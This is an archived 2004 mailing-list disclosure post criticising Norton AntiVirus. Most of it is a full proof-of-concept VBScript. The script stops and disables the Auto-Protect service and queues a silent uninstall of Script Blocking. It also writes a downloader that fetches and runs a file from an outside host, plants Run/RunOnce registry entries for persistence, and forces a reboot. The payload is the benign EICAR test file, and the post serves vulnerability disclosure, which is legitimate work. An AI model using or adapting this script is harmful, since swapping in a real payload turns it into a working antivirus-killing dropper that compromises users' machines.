lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <4189812E.40202@myrealbox.com>
Date: Wed, 03 Nov 2004 20:09:02 -0500
From: Daniel Milisic <dmilisic@...ealbox.com>
To: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes
 PoC VBScript Code)


Hi All,

I have major issues with the quality of Norton AntiVirus.  For some 
history, see:

  http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html
  - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)

  http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html
  - Norton AntiVirus 2004/2005 Script Blocking Redux

Symantec's Response to this issue: (From a week ago)

"ScriptBlocking is intended to provide proactive detection against 
script-based worms and this component of Norton AntiVirus has been 
effective at doing this since its introduction in 2001"

Huh?

Below is a 'typical' script-based virus that Norton AntiVirus will allow 
a user to run, without *any* intervention on NAV's part whatsoever. 
It's likely that code similar to this is already appended to 
script-based threats/worms to assist their penetration in the wild.

In a nutshell, here's what it does:

On Reboot it sets...

1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later

....Then Reboots your computer.

The following code was tested under WinXP and a fully LiveUpdated NAV 
2005 using a broadband Internet connection.  Should be fine for Win2000 
and NAV 2004 as well.

--------------//// BEGIN DISABLE_NAV.VBS ////-----------------

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----

sServer = "."
Set oWMI = GetObject("winmgmts://.")

sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
     & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set objRegistry = 
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, 
arrStringValues

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------

Set objRegistry = 
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set 
X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open 
"+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set 
Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write 
X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close > 
estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, 
arrStringValues

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------

Set objRegistry = 
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set 
Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd 
/k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, 
arrStringValues

' -------- LAUNCH EICAR DOWNLOADER ----------

Set objRegistry = 
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, 
arrStringValues

' --------  RUN THE 'VIRUS' ----------

Set objRegistry = 
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, 
arrStringValues

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----

Set wmi    = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
  for each obj in objset
   set os = obj : exit for
  next
os.win32shutdown 2 + 4

--------------//// END DISABLE_NAV.VBS ////-----------------

Best Regards,
Daniel Milisic

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ